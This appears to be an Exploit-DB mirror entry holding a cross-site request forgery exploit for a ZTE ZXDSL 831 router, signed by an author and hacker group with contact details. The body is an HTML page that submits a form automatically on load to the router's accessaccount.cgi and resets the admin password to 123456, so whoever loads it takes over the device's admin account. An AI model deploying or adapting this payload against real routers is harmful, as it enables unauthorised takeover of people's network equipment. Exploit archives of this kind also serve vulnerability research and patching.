exploit-db-mirror/exploits/cgi/webapps/18722.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

14 lines
No EOL
1.2 KiB
Text

# Exploit Title: ZTE Change admin password
# Author: Nuevo Asesino
# Version: ZTE Inc., Software Release ZXDSL 831IIV7.5.0a_Z29_OV
#################################################################################################
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>Exploit By Nuevo Asesino </H2>
<form method="POST" name="form0" action="http:\192.168.1.1\accessaccount.cgi?sysPassword=123456">
</form>
</body>
</html> ##################################################################################################
password ======> 123456
Now you can get the username & the password------------------------------------------------------Contact :Oeb1590@hotmail.comFacebook : Https:\www.facebook.com\Want.Revenge
\|||/ .-.________ (o o) ________.-. -----/ \_)_______) +----------oooO------------+ (_______(_/ \------ ( ()___) The Blacke Devils (___() ) ()__) (__() ----\___()_) Algeria Warriors (_()___/----- +-------------Ooo----------+ In:Arab47.com